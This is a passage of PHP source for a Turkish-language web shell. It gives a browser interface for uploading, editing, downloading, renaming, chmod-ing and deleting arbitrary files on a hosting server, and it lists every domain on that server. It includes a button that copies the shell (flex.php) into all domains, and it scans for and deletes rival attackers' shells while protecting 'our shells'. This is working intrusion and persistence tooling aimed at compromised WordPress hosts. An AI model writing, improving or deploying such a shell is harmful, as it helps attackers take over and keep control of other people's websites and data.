elseif ($action === 'chmod') { $file = $_POST['file'] ?? ''; $mode = $_POST['mode'] ?? ''; if ($file && $mode) { chmod($file, octdec($mode)); $output = "İzin değiştirildi!"; } }
elseif ($action === 'upload' && isset($_FILES['files'])) {
$uploaded = 0;
foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
$name = $_FILES['files']['name'][$i];
if (move_uploaded_file($tmp, $current_dir . '/' . $name)) { chmod($current_dir . '/' . $name, 0644); $uploaded++; }
}
$output = "$uploaded dosya yüklendi!";
}
if ($output) echo "<script>alert(" . json_encode($output) . ");</script>";
header('Location: ?dir=' . urlencode($current_dir));
exit;
}
if (isset($_GET['download'])) {
$file = $_GET['download'];
if (file_exists($file)) {
while (ob_get_level()) ob_end_clean();
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
}
$items = scandir($current_dir);
$folders = array(); $files = array();
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
$path = $current_dir . '/' . $item;
if (is_dir($path)) $folders[] = $item;
else $files[] = $item;
}
sort($folders); sort($files);
$malicious_files = (isset($_SESSION['malicious']) && isset($_SESSION['scan_completed'])) ? $_SESSION['malicious'] : array();
$analysis = $_SESSION['analysis'] ?? ''; $analysis_file = $_SESSION['analysis_file'] ?? '';
unset($_SESSION['analysis'], $_SESSION['analysis_file']);
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"><title>GELİŞMİŞ SHELL - KORUMALI</title>
<style>
* { margin:0; padding:0; box-sizing:border-box; }
body { background:#1e272e; color:#fff; font-family:Arial; padding:20px; }
.container { max-width:1400px; margin:0 auto; background:#2f3640; padding:20px; border-radius:10px; }
h2 { font-size:16px; margin-bottom:15px; padding:10px; background:#353b48; border-radius:5px; word-break:break-all; }
h3 { margin:15px 0 10px; color:#00a8ff; }
.toolbar { display:flex; gap:8px; flex-wrap:wrap; margin-bottom:20px; background:#353b48; padding:10px; border-radius:5px; align-items:center; }
button, a.button { background:#40739e; color:#fff; border:none; padding:8px 12px; border-radius:5px; cursor:pointer; text-decoration:none; font-size:13px; }
button:hover, a.button:hover { background:#487eb0; }
.danger { background:#e84118; }
.danger:hover { background:#c23616; }
.success { background:#44bd32; }
.warning { background:#f39c12; }
.info { background:#00a8ff; }
.download-btn { background:#00a8ff; }
.rename-btn { background:#f39c12; }
.analyze-btn { background:#9b59b6; }
.edit-btn { background:#3498db; }
.delete-btn { background:#e84118; }
.row { display:grid; grid-template-columns:30px 2fr auto; gap:10px; align-items:center; background:#353b48; padding:8px; border-radius:5px; margin:4px 0; }
.row:hover { background:#40739e; }
.row.malicious { background:#3d2d2d; border-left:3px solid #e84118; }
.row.our-shell { background:#1d3d2d; border-left:3px solid #44bd32; }
.row.plugin-suspicious { background:#3d2d2d; border-left:3px solid #f39c12; }
.row.theme-inactive { background:#2d2d2d; border-left:3px solid #888; }
.row.protected { background:#2d2d2d; border-left:3px solid #44bd32; opacity:0.9; }
.name a { color:#00a8ff; text-decoration:none; }
.wp-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; }
.our-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; }
.malicious-badge { background:#e84118; color:#fff; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; }
.plugin-suspicious-badge { background:#f39c12; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; }
.active-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; }
.inactive-badge { background:#888; color:#fff; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; }
.protected-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; font-weight:bold; }
.inline-controls { display:flex; gap:6px; align-items:center; flex-wrap:wrap; }
.chmod-input { width:60px; background:#1e272e; border:1px solid #40739e; color:#fff; padding:4px; text-align:center; border-radius:3px; }
.list-header { display:flex; justify-content:space-between; align-items:center; margin:15px 0; }
hr { border:1px solid #353b48; margin:20px 0; }
.modal { display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.8); z-index:1000; }
.modal.active { display:flex; align-items:center; justify-content:center; }
.modal-content { background:#2f3640; padding:20px; width:900px; border-radius:10px; max-height:80vh; overflow-y:auto; }
.domain-list { max-height:400px; overflow-y:auto; margin:10px 0; border:1px solid #40739e; border-radius:5px; }
.domain-item { padding:10px; background:#353b48; margin:2px 0; cursor:pointer; border-bottom:1px solid #40739e; display:flex; justify-content:space-between; align-items:center; }
.domain-item:hover { background:#40739e; }
.domain-url { color:#00a8ff; font-weight:bold; font-size:14px; }
.domain-path { color:#888; font-size:11px; margin-top:3px; }
.domain-badge { background:#44bd32; color:#000; padding:2px 6px; border-radius:3px; font-size:10px; margin-left:5px; }
.protocol-http { background:#f39c12; }
.protocol-https { background:#44bd32; }
.domain-stats { display:flex; gap:10px; margin-bottom:10px; flex-wrap:wrap; }
.domain-stat-box { background:#353b48; padding:8px 12px; border-radius:5px; flex:1; text-align:center; min-width:120px; }
.section { margin:20px 0; padding:15px; background:#353b48; border-radius:8px; }
.section-title { font-size:18px; color:#00a8ff; margin-bottom:10px; padding-bottom:5px; border-bottom:1px solid #40739e; }
.button-group { display:flex; gap:5px; flex-wrap:wrap; }
.delete-section { margin-top:20px; padding:15px; background:#3d2d2d; border-radius:8px; border-left:3px solid #e84118; }
.delete-title { color:#e84118; font-weight:bold; margin-bottom:10px; }
.pre-box { background:#1e272e; padding:15px; border-radius:5px; color:#0f0; font-family:monospace; white-space:pre-wrap; max-height:500px; overflow:auto; border:1px solid #40739e; }
.stats { background:#353b48; padding:10px; border-radius:5px; margin:10px 0; display:flex; gap:20px; flex-wrap:wrap; }
.stat-item { flex:1; text-align:center; min-width:100px; }
.stat-value { font-size:24px; font-weight:bold; color:#00a8ff; }
.stat-label { font-size:12px; color:#888; }
</style>
<script>
function toggleAll(s) { document.querySelectorAll("input[name='bulk_delete[]']").forEach(cb => cb.checked = s.checked); }
function toggleMalicious(s) { document.querySelectorAll("input[name='selected[]']").forEach(cb => cb.checked = s.checked); }
function showRenameModal(path, name) { document.getElementById('rename_old').value = path; document.getElementById('rename_new').value = name; document.getElementById('renameModal').classList.add('active'); }
function hideRenameModal() { document.getElementById('renameModal').classList.remove('active'); }
function showDomainModal() { document.getElementById('domainModal').classList.add('active'); }
function hideDomainModal() { document.getElementById('domainModal').classList.remove('active'); }
function showMaliciousModal() { document.getElementById('maliciousModal').classList.add('active'); }
function hideMaliciousModal() { document.getElementById('maliciousModal').classList.remove('active'); }
function goToDomain(path) { window.location.href = '?dir=' + encodeURIComponent(path); }
function openDomainUrl(url) { window.open(url, '_blank'); }
function downloadFile(path) { window.location.href = '?download=' + encodeURIComponent(path); }
function analyzeFile(path) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input name="action" value="analyze"><input name="file" value="' + path.replace(/"/g, '"') + '">'; document.body.appendChild(form); form.submit(); }
function editFile(path) { window.location.href = '?edit=' + encodeURIComponent(path) + '&dir=<?php echo urlencode($current_dir); ?>'; }
function deployShell() { if(confirm('Tüm domainlere shell kopyalansın mı? (flex.php)')) { window.location.href = '?deploy=run'; } }
</script>
</head>
<body>
<div class="container">
<div style="background:#353b48; padding:5px; margin-bottom:10px; text-align:center; color:#00a8ff; font-weight:bold;">
🔥 GELİŞMİŞ SHELL - KORUMALI | Sadece izinli dosyalar: <?php echo implode(', ', $allowed_shells); ?>
</div>
<h2>📁 <?php echo htmlspecialchars($current_dir); ?></h2>
<div class="toolbar">
<a href="?logout=1" class="button">Çıkış</a>
<?php if (dirname($current_dir) != $current_dir): ?>
<a class="button" href="?dir=<?php echo urlencode(dirname($current_dir)); ?>">⬆ Üst Dizin</a>
<?php endif; ?>
<button class="success" onclick="showDomainModal()">🌐 Domainler (<?php echo count($all_domains); ?>)</button>
<button class="warning" onclick="deployShell()">📋 SHELL KOPYALA (flex.php)</button>
<form method="post" style="display:inline;">
<input type="hidden" name="action" value="scan">
<button type="submit" class="danger">🔍 ZARARLI SHELL TARA</button>
</form>
<?php if (!empty($malicious_files)): ?>
<button class="danger" onclick="showMaliciousModal()">⚠️ ZARARLI SHELL'LER (<?php echo count($malicious_files); ?>)</button>
<?php endif; ?>
<span style="margin-left:auto; color:#00a8ff;">Korunan: <?php echo count($our_shells) + count($wordpress_core_files) + count($protected_files); ?> dosya</span>
</div>
<div id="domainModal" class="modal">
<div class="modal-content">
<h3>🌐 Sunucudaki Domainler (Tam URL)</h3>
<div class="domain-stats">
<div class="domain-stat-box"><div class="stat-value"><?php echo count($all_domains); ?></div><div class="stat-label">Toplam Domain</div></div>
<div class="domain-stat-box"><div class="stat-value"><?php echo count(array_filter($all_domains, function($d) { return strpos($d['url'], 'https') === 0; })); ?></div><div class="stat-label">HTTPS</div></div>
<div class="domain-stat-box"><div class="stat-value"><?php echo count(array_filter($all_domains, function($d) { return strpos($d['url'], 'http:') === 0; })); ?></div><div class="stat-label">HTTP</div></div>
</div>
<div class="domain-list">
<?php if (empty($all_domains)): ?>
<p style="padding:10px;">Domain bulunamadı.</p>
<?php else: ?>
<?php foreach ($all_domains as $d): ?>
<div class="domain-item">
<div style="flex:2;" onclick="goToDomain('<?php echo htmlspecialchars($d['path']); ?>')">
<span class="domain-url">
<?php if (strpos($d['url'], 'https') === 0): ?>🔒 <?php else: ?>🔓 <?php endif; ?>
<?php echo htmlspecialchars($d['url']); ?>
<span class="domain-badge <?php echo (strpos($d['url'], 'https') === 0) ? 'protocol-https' : 'protocol-http'; ?>"><?php echo (strpos($d['url'], 'https') === 0) ? 'HTTPS' : 'HTTP'; ?></span>
</span>
<div class="domain-path">📁 <?php echo htmlspecialchars($d['path']); ?> [<?php echo $d['type']; ?>]</div>
</div>
<div style="display:flex; gap:5px;">
<button class="button info" onclick="event.stopPropagation(); openDomainUrl('<?php echo htmlspecialchars($d['url']); ?>')" style="padding:4px 8px; font-size:11px;">🌐 Siteyi Aç</button>
<button class="button" onclick="event.stopPropagation(); goToDomain('<?php echo htmlspecialchars($d['path']); ?>')" style="padding:4px 8px; font-size:11px;">📂 Dizine Git</button>
</div>
</div>
<?php endforeach; ?>
<?php endif; ?>
</div>
<div style="margin-top:15px; text-align:right;"><button onclick="hideDomainModal()">Kapat</button></div>
</div>
</div>
<?php if (!empty($malicious_files)): ?>
<div id="maliciousModal" class="modal">
<div class="modal-content">
<h3>⚠️ ZARARLI SHELL DOSYALARI</h3>
<p>Toplam: <?php echo count($malicious_files); ?> zararlı dosya bulundu.</p>
<form method="post">
<input type="hidden" name="action" value="delete_selected">
<table style="width:100%;">
<tr><th width="30"><input type="checkbox" onclick="toggleMalicious(this)"></th><th>Dosya</th><th>Risk</th><th width="350">İşlemler</th></tr>
<?php foreach ($malicious_files as $m): ?>
<tr>
<td><input type="checkbox" name="selected[]" value="<?php echo htmlspecialchars($m['path']); ?>"></td>
<td><strong><?php echo htmlspecialchars($m['name']); ?></strong><br><small><?php echo htmlspecialchars(substr(dirname($m['path']), 0, 50)); ?><br>Boyut: <?php echo $m['size']; ?> bytes</small></td>
<td><span class="<?php echo ($m['risk'] > 70) ? 'risk-high' : (($m['risk'] > 40) ? 'risk-medium' : 'risk-low'); ?>"><?php echo $m['risk']; ?></span></td>
<td><div class="button-group"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($m['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($m['path']); ?>', '<?php echo addslashes($m['name']); ?>')">✏️ Adlandır</button><button type="button" class="analyze-btn" onclick="analyzeFile('<?php echo addslashes($m['path']); ?>')">🔍 Analiz</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($m['path']); ?>')">✏️ Düzenle</button></div></td>
</tr>
<?php endforeach; ?>
</table>
<div style="margin-top:15px; display:flex; gap:10px; justify-content:space-between;"><div><button type="submit" class="danger">🗑 SEÇİLİ ZARARLILARI SİL</button></div><div><button type="button" class="button" onclick="hideMaliciousModal()">Kapat</button></div></div>
</form>
</div>
</div>
<?php endif; ?>
<form method="post" enctype="multipart/form-data" style="margin:10px 0;">
<input type="file" name="files[]" multiple>
<input type="hidden" name="action" value="upload">
<input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>">
<button type="submit" class="success">📤 Yükle</button>
</form>
<hr>
<?php if (!empty($plugins['suspicious'])): ?>
<div class="delete-section">
<div class="delete-title">⚠️ ŞÜPHELİ EKLENTİLER (<?php echo count($plugins['suspicious']); ?>) - SİLİNEBİLİR</div>
<?php foreach ($plugins['suspicious'] as $plugin): ?>
<div class="row plugin-suspicious">
<div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($plugin['path']); ?>"></div>
<div>📦 <?php echo htmlspecialchars($plugin['name']); ?><?php if ($plugin['active']): ?><span class="active-badge">AKTİF</span><?php else: ?><span class="inactive-badge">PASİF</span><?php endif; ?><span class="plugin-suspicious-badge">ŞÜPHELİ</span></div>
<div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($plugin['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($plugin['path']); ?>', '<?php echo addslashes($plugin['name']); ?>')">✏️ Adlandır</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($plugin['path']); ?>')">✏️ Düzenle</button><button type="button" class="delete-btn" onclick="if(confirm('Bu eklentiyi silmek istediğinize emin misiniz?')) { document.getElementById('delete_form_<?php echo md5($plugin['path']); ?>').submit(); }">🗑 Sil</button><a href="?dir=<?php echo urlencode($plugin['path']); ?>" class="button">🔍 İncele</a></div>
</div>
<form id="delete_form_<?php echo md5($plugin['path']); ?>" method="post" style="display:none;"><input type="hidden" name="action" value="bulk_delete"><input type="hidden" name="bulk_delete[]" value="<?php echo htmlspecialchars($plugin['path']); ?>"></form>
<?php endforeach; ?>
</div>
<?php endif; ?>
<?php if (!empty($themes['inactive'])): ?>
<div class="delete-section">
<div class="delete-title">💤 PASİF TEMALAR (<?php echo count($themes['inactive']); ?>) - SİLİNEBİLİR</div>
<?php foreach ($themes['inactive'] as $theme): ?>
<div class="row theme-inactive">
<div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($theme['path']); ?>"></div>
<div>🎨 <?php echo htmlspecialchars($theme['name']); ?><span class="inactive-badge">PASİF</span></div>
<div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($theme['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($theme['path']); ?>', '<?php echo addslashes($theme['name']); ?>')">✏️ Adlandır</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($theme['path']); ?>')">✏️ Düzenle</button><button type="button" class="delete-btn" onclick="if(confirm('Bu temayı silmek istediğinize emin misiniz?')) { document.getElementById('delete_theme_<?php echo md5($theme['path']); ?>').submit(); }">🗑 Sil</button><a href="?dir=<?php echo urlencode($theme['path']); ?>" class="button">🔍 İncele</a></div>
</div>
<form id="delete_theme_<?php echo md5($theme['path']); ?>" method="post" style="display:none;"><input type="hidden" name="action" value="bulk_delete"><input type="hidden" name="bulk_delete[]" value="<?php echo htmlspecialchars($theme['path']); ?>"></form>
<?php endforeach; ?>
</div>
<?php endif; ?>
<form method="post" onsubmit="return confirm('Seçili dosya/klasörleri silmek istediğinize emin misiniz?');">
<input type="hidden" name="action" value="bulk_delete">
<input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>">
<div class="list-header">
<div class="select-all"><input type="checkbox" onclick="toggleAll(this)"> <strong>Tümünü Seç</strong> <span style="color:#888; font-size:12px; margin-left:10px;">(Korunan dosyalar seçilemez ve silinemez)</span></div>
<button type="submit" class="button danger">Seçileni Sil</button>
</div>
<h3>📁 Klasörler</h3>
<?php foreach ($folders as $folder):
$path = $current_dir . '/' . $folder;
$perm = substr(sprintf('%o', fileperms($path)), -3);
$id = 'chmod_' . md5($path);
$is_wp_dir = in_array($folder, $wordpress_core_dirs);
$is_our_shell = in_array($folder, $our_shells);
$is_protected = $is_wp_dir || $is_our_shell;
?>
<div class="row <?php if ($is_protected) echo 'protected'; ?>">
<div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if ($is_protected) echo 'disabled'; ?>></div>
<div class="name">📁 <a href="?dir=<?php echo urlencode($path); ?>"><?php echo htmlspecialchars($folder); ?></a><?php if ($is_wp_dir): ?><span class="wp-badge">WORDPRESS</span><?php endif; ?><?php if ($is_our_shell): ?><span class="our-badge">SHELL</span><?php endif; ?></div>
<div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button><?php if (!$is_protected): ?><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($path); ?>', '<?php echo addslashes($folder); ?>')">✏️ Adlandır</button><?php endif; ?><input form="<?php echo $id; ?>" class="chmod-input" type="text" name="mode" value="<?php echo htmlspecialchars($perm); ?>"><button form="<?php echo $id; ?>" class="button" type="submit">İzin</button></div>
</div>
<?php endforeach; ?>
<h3>📄 Dosyalar</h3>
<?php foreach ($files as $file):
$path = $current_dir . '/' . $file;
$perm = substr(sprintf('%o', fileperms($path)), -3);
$id = 'chmod_' . md5('f_'.$path);
$editUrl = '?edit=' . urlencode($path) . '&dir=' . urlencode($current_dir);
$is_protected = false; $protected_type = '';
if (in_array($file, $protected_files)) { $is_protected = true; $protected_type = 'KORUNAN'; }
elseif (in_array($file, $wordpress_core_files)) { $is_protected = true; $protected_type = 'WORDPRESS'; }
elseif (in_array($file, $our_shells)) { $is_protected = true; $protected_type = 'SHELL'; }
$is_malicious = false; $malicious_risk = 0;
if (!$is_protected && isset($_SESSION['malicious'])) {
foreach ($_SESSION['malicious'] as $m) { if ($m['path'] == $path) { $is_malicious = true; $malicious_risk = $m['risk']; break; } }
}
$row_class = $is_protected ? 'protected' : ($is_malicious ? 'malicious' : '');
?>
<div class="row <?php echo $row_class; ?>">
<div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if ($is_protected) echo 'disabled'; ?>></div>
<div class="name">📄 <?php echo htmlspecialchars($file); ?><?php if ($protected_type): ?><span class="<?php echo ($protected_type == 'WORDPRESS') ? 'wp-badge' : (($protected_type == 'SHELL') ? 'our-badge' : 'protected-badge'); ?>"><?php echo $protected_type; ?></span><?php endif; ?><?php if ($is_malicious): ?><span class="malicious-badge">ZARARLI (<?php echo $malicious_risk; ?>)</span><?php endif; ?></div>
<div class="inline-controls">
<button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button>
<?php if (!$is_protected): ?><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($path); ?>', '<?php echo addslashes($file); ?>')">✏️ Adlandır</button><?php endif; ?>
<a class="button" href="<?php echo $editUrl; ?>" onclick="<?php if ($is_protected) echo 'return confirm(\'Bu dosya KORUNAN bir dosyadır. Düzenlemek sitenin çalışmasını bozabilir. Devam etmek istediğinize emin misiniz?\');'; ?>">Düzenle</a>
<input form="<?php echo $id; ?>" class="chmod-input" type="text" name="mode" value="<?php echo htmlspecialchars($perm); ?>">
<button form="<?php echo $id; ?>" class="button" type="submit">İzin</button>
<?php if ($is_malicious): ?><button type="button" class="analyze-btn" onclick="analyzeFile('<?php echo addslashes($path); ?>')">🔍 Analiz</button><?php endif; ?>
</div>
</div>
<?php endforeach; ?>
<div class="list-header"><div></div><button type="submit" class="button danger">Seçileni Sil</button></div>
</form>
<?php
foreach ($folders as $folder){ $path = $current_dir . '/' . $folder; $id = 'chmod_' . md5($path); echo '<form id="'.$id.'" method="post" style="display:none"><input type="hidden" name="action" value="chmod"><input type="hidden" name="current_dir" value="'.htmlspecialchars($current_dir).'"><input type="hidden" name="target" value="'.htmlspecialchars($path).'"></form>'; }
foreach ($files as $file){ $path = $current_dir . '/' . $file; $id = 'chmod_' . md5('f_'.$path); echo '<form id="'.$id.'" method="post" style="display:none"><input type="hidden" name="action" value="chmod"><input type="hidden" name="current_dir" value="'.htmlspecialchars($current_dir).'"><input type="hidden" name="target" value="'.htmlspecialchars($path).'"></form>'; }
?>
<div id="renameModal" class="modal">
<div class="modal-content">
<h3>📝 Dosya/Klasör Adını Değiştir</h3>
<form method="post">
<input type="hidden" name="action" value="rename">
<input type="hidden" name="old" id="rename_old">
<input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>">
<p style="margin-bottom:10px;">Yeni isim:</p>
<input type="text" name="new" id="rename_new" required style="width:100%; padding:8px; margin-bottom:15px; background:#1e272e; color:#fff; border:1px solid #40739e; border-radius:5px;">
<div style="text-align:right; display:flex; gap:10px; justify-content:flex-end;"><button type="button" class="button" onclick="hideRenameModal()">İptal</button><button type="submit" class="success">Değiştir</button></div>
</form>
</div>
</div>
<?php if (isset($_GET['edit']) && file_exists($_GET['edit'])):
$file_to_edit = $_GET['edit'];
$is_protected = in_array(basename($file_to_edit), $protected_files) || in_array(basename($file_to_edit), $wordpress_core_files) || in_array(basename($file_to_edit), $our_shells);
?>
<hr>
<h3>✍️ Dosyayı Düzenle: <?php echo htmlspecialchars(basename($file_to_edit)); ?></h3>
<?php if ($is_protected): ?><div style="background:#e84118; padding:10px; border-radius:5px; margin-bottom:10px; color:#fff; font-weight:bold;">⚠️ UYARI: Bu dosya KORUNAN bir dosyadır. Düzenlemek sitenin çalışmasını bozabilir!</div><?php endif; ?>
<form method="post">
<textarea name="content"><?php echo htmlspecialchars(file_get_contents($file_to_edit)); ?></textarea>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($file_to_edit); ?>">
<input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($_GET['dir'] ?? $current_dir); ?>">
<div class="toolbar" style="margin-top:10px"><button class="button" type="submit">Kaydet</button><a class="button" href="?dir=<?php echo urlencode($_GET['dir'] ?? $current_dir); ?>">İptal</a></div>
</form>
<?php endif; ?>
<?php if (!empty($analysis)): ?>
<hr>
<h3>🔍 Dosya Analizi: <?php echo htmlspecialchars(basename($analysis_file)); ?></h3>
<div class="pre-box"><?php echo nl2br(htmlspecialchars($analysis)); ?></div>
<?php endif; ?>
<div class="stats">
<div class="stat-item"><div class="stat-value"><?php echo count($files); ?></div><div class="stat-label">Dosya</div></div>
<div class="stat-item"><div class="stat-value"><?php echo count($folders); ?></div><div class="stat-label">Klasör</div></div>
<div class="stat-item"><div class="stat-value"><?php echo count($malicious_files); ?></div><div class="stat-label">Zararlı</div></div>
<div class="stat-item"><div class="stat-value"><?php echo count($our_shells); ?></div><div class="stat-label">Bizim Shell</div></div>
<div class="stat-item"><div class="stat-value"><?php echo count($wordpress_core_files); ?></div><div class="stat-label">WP Core</div></div>
<div class="stat-item"><div class="stat-value"><?php echo count($protected_files); ?></div><div class="stat-label">Özel Koruma</div></div>
</div>
<div style="text-align:center; margin-top:20px; color:#888; font-size:12px;">
🔒 Gelişmiş Shell - Sadece izinli dosyalar çalışır: <?php echo implode(', ', $allowed_shells); ?>
</div>
</div>
</body>
</html>